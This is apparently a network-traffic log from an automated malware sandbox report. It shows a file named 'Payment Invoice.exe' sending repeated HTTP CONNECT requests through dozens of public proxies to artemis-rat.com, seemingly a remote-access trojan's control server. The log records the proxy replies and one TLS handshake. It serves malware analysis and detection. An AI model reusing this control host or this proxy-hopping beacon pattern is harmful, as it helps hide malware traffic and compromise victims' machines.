                                                                Mar 11, 2024 16:15:25.857470989 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                821192.168.2.45246160.12.168.11490027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.786643982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.300220966 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:54:01 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                822192.168.2.451604177.55.247.4180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.792882919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.823998928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.378170967 CET19INHTTP/1.1 200 OK
                                                                Mar 11, 2024 16:16:24.522361994 CET208INHTTP/1.0 504 Gateway Timeout
                                                                Content-Length: 736
                                                                Content-Type: text/html
                                                                Date: Mon, 11 Mar 2024 15:16:24 GMT
                                                                Expires: Mon, 11 Mar 2024 15:16:24 GMT
                                                                Server: Mikrotik HttpProxy
                                                                Proxy-Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                823192.168.2.451707159.65.77.16885857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.794578075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                824192.168.2.452517147.75.34.86100077076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.802623034 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:18.109215021 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                825192.168.2.45171134.83.143.631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.939858913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.219558954 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                826192.168.2.451785209.126.104.38150977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.943463087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.011331081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.012236118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.011426926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.026688099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.120434046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.120481968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.214251041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:18.323803902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                827192.168.2.45252143.163.192.3156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.946028948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                828192.168.2.451770146.19.106.217123347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.947793007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                829192.168.2.450329157.245.131.28304227076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.948440075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.980097055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.049252033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.089633942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.182949066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.276722908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.276761055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.292359114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:18.363195896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                830192.168.2.45252572.210.221.22341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.963449955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                831192.168.2.450214208.109.14.49420727076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.968947887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.980165005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.049263954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.089634895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.182992935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.277367115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.277349949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.293329954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                832192.168.2.452524147.75.34.85807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.974092007 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:18.275454044 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3
                                                                Mar 11, 2024 16:15:18.275803089 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 04 68 bc b0 0e f5 39 50 ab dd 43 8a 3d 19 5d 1c cb 15 aa f2 ed 8a 6a c8 60 35 bf 19 32 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e h9PC=]j`52*,+0/$#('=<5/Uartemis-rat.com#


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                833192.168.2.45252345.138.87.23810807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.974617004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                834192.168.2.452531162.120.71.11807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.975004911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.200129986 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                835192.168.2.45179339.109.113.9731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.981650114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.129576921 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.16.1
                                                                Date: Mon, 11 Mar 2024 14:53:59 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                836192.168.2.452590172.67.182.38807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.983253002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.139863014 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                837192.168.2.45255323.19.244.10910807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.985364914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                838192.168.2.451978162.240.208.185619277076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.985588074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.089268923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.183450937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.238461971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.335905075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.386066914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.387604952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.386127949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                839192.168.2.452605104.21.102.95807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.014699936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.169284105 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                840192.168.2.452552104.20.34.100807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.016410112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.170859098 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
